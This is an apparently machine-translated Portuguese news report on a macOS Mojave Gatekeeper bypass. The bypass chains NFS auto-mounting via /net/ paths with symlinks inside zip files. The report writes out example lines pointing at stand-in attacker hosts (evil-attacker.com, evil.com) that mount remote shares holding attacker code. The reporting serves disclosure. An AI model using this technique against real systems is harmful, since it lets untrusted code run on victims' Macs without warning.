Uma vulnerabilidade não corrigida no MacOS 10.14.5 também conhecido como Mojave foi recentemente descoberto. A falha pode permitir que um invasor executar código arbitrário sem a necessidade de interação do usuário, ignorando assim gatekeeper.
Esta descoberta vem do pesquisador Filippo Cavallarin da Segment, uma empresa de segurança cibernética com sede na Itália. “Na versão MacOS X <= 10.14.5 (at time of writing) it is possible to easily bypass Gatekeeper in order to execute untrusted code without any warning or user's explicit permission,”O pesquisador escreveu.
Como é possível o desvio do Gatekeeper?
Primeiro, deve-se notar que está no design do Gatekeeper aceitar unidades externas e compartilhamentos de rede como locais seguros, permitindo que os aplicativos que eles contêm sejam executados perfeitamente. Contudo, reunindo dois recursos legítimos do macOS, é possível enganar o Gatekeeper e seu “comportamento pretendido”.
assim, quais são esses recursos? O primeiro permite que um usuário monte automaticamente um compartilhamento de rede simplesmente aceitando um caminho que começa com “/ net /”:
Por exemplo
ls /net/evil-attacker.com/sharedfolder/
fará com que o sistema operacional leia o conteúdo da pasta "compartilhada’ no host remoto (evil-attacker.com) usando NFS.
O outro recurso é sobre arquivos zip contendo links simbólicos que apontam para locais arbitrários. além disso, o software que descompacta arquivos zip no macOS não verifica os links simbólicos antes de criá-los, explica a pesquisadora.
Como funcionaria um ataque? Um invasor pode criar um arquivo zip com um link simbólico para um endpoint controlado por hacker de montagem automática (ex Documentos -> /net/evil.com/Documentos) e poderia enviá-lo para um sistema direcionado. O usuário baixaria o arquivo malicioso, e extrairia o arquivo malicioso sem suspeitar de nada.
Agora a vítima está em um local controlado pelo invasor, mas confiável para o Gatekeeper, portanto, qualquer executável controlado pelo invasor pode ser executado sem qualquer aviso. A forma como o Finder foi projetado (ex ocultar extensões .app, ocultar o caminho completo da barra de título) torna esta técnica muito eficaz e difícil de detectar, o investigador observar.
Também há um demonstração de vídeo de como funciona este desvio do Gatekeeper.
Este não é o primeiro caso de proteção integrada do macOS a.k.a. Gatekeeper sendo contornado. Em fevereiro deste ano, Os pesquisadores de segurança da Trend Micro descobriram que um arquivo malicioso .exe do Windows pode infectar computadores Mac, e poderia baixar malware infostealer acompanhado de adware em seus sistemas.
Nesse caso, os arquivos .exe conseguiram escapar da proteção do Gatekeeper porque não foram verificados pelo software, projetado para verificar arquivos do Mac única nativas. Isso pode levar ao desvio da verificação e verificação da assinatura do código.